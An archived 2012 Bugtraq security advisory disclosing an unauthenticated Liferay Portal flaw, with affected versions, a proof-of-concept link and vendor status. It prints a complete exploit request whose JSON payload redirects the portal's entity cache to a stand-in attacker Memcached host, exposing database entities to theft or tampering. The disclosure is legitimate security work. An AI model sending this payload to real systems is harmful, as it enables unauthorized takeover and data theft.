lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Thu, 19 Apr 2012 22:57:36 +0200
From: Jelmer Kuperus <jelmer.advisories@...il.com>
To: BUGTRAQ@...urityfocus.com
Subject: Specially crafted Json service request allows full control over a
 Liferay portal instance

Specially crafted Json service request allows full control over a
Liferay portal instance

Description:

Liferay Portal is an enterprise portal written in Java

By doing a single http request you can reconfigure Liferay to use a
remote Memcached cache instead of it's own cache.

http://vulnerablehost/c/portal/json_service?serviceClassName=com.liferay.portal.service.UserServiceUtil&serviceMethodName=updatePortrait&serviceParameters=[%22userId%22%2C%22bytes%22]&userId=1&bytes={"class":"com.liferay.portal.kernel.dao.orm.EntityCacheUtil","entityCache":{"class":"com.liferay.portal.dao.orm.common.EntityCacheImpl","multiVMPool":{"class":"com.liferay.portal.cache.MultiVMPoolImpl","portalCacheManager":{"class":"com.liferay.portal.cache.memcached.MemcachePortalCacheManager","timeout":60,"timeoutTimeUnit":"SECONDS","memcachedClientPool":{"class":"com.liferay.portal.cache.memcached.DefaultMemcachedClientFactory","connectionFactory":{"class":"net.spy.memcached.BinaryConnectionFactory"},"addresses":["remoteattackerhost:11211"]}}}}}

This means that all entities stored in the database will now be cached
in a Memcached instance hosted on the attackers host, where they can
be retrieved or manipulated at will by the attacker. A moderately
skilled attacker could leverage this to gain administrative access to
the system. The attacker does not need to have an account on the
portal in order to execute this attack

Proof of concept:

Code demonstrating the vulnerability can be found at

https://github.com/jelmerk/LPS-26558-proof

Systems affected:

Liferay 6.1 ce is confirmed to be vulnerable
Liferay 6 ee service servicepack 2 is most likely vulnerable
Liferay 6.1 ee is most likely vulnerable

Vendor status :

Liferay  was notified april 6 2012 by filing a bug in their public
bugtracker under issue number LPS-26558. The issue has since been
flagged as private and has been resolved.

Powered by blists - more mailing lists